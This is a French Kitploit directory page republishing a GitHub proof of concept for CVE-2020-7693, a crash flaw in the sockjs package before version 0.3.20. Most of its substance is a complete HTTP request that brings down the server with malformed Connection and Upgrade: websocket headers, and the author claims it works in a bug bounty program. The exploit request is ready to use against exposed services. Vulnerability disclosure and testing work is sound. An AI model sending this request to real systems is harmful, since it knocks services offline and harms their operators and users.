Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-7693 — POC For CVE-2020-7693 (Testing on Version sockjs@0.3.18) | Kitploit
Outils/GitHubGitHub/thewindghost/cve-2020-7693
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthewindghost/cve-2020-7693

CVE-2020-7693

POC For CVE-2020-7693 (Testing on Version [email protected])

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-7693 PoC

Note : Je confirme que la charge utile pour CVE-2020-7693 peut être exécutée dans un programme de Bug Bounty

Description :

  • Une gestion incorrecte de l'en-tête Upgrade avec la valeur websocket entraîne un crash des conteneurs hébergeant des applications sockjs. Cela affecte le package sockjs avant la version 0.3.20.

Une seule requête fait planter le serveur via un sockjs-node obsolète :

  • Requête
root@kitploit:~
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)

  • Réponse
image

Dans le serveur :

image image
Télécharger l’outil